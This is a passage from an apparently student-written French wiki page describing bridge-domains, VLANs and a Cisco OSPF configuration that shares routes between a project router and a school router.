Les bridge-domains de 20 à 26 sont utilisés pour les VLAN correspondant à chaque utilisateur tandis que le BDI 31 est utilisé pour la communication avec le routeur de l'école.<br />
<br />
=== OSPF ===<br />
<br />
Le protocole OSPF (Open Shortest Path First) nous permet de partager nos tables de routage entre notre routeur et le routeur de l'école (192.168.222.8).<br />
<br />
router ospf 1<br />
router-id 10.60.20.1<br />
summary-address 10.60.20.0 255.255.255.0<br />
summary-address 10.60.21.0 255.255.255.0<br />
summary-address 10.60.22.0 255.255.255.0<br />
summary-address 10.60.23.0 255.255.255.0<br />
summary-address 10.60.24.0 255.255.255.0<br />
summary-address 10.60.25.0 255.255.255.0<br />
summary-address 10.60.26.0 255.255.255.0<br />
summary-address 193.48.57.176 255.255.255.240<br />
redistribute connected subnets<br />
redistribute static subnets route-map ospf<br />
network 192.168.222.8 0.0.0.7 area 2<br />
!</div>
Dfourny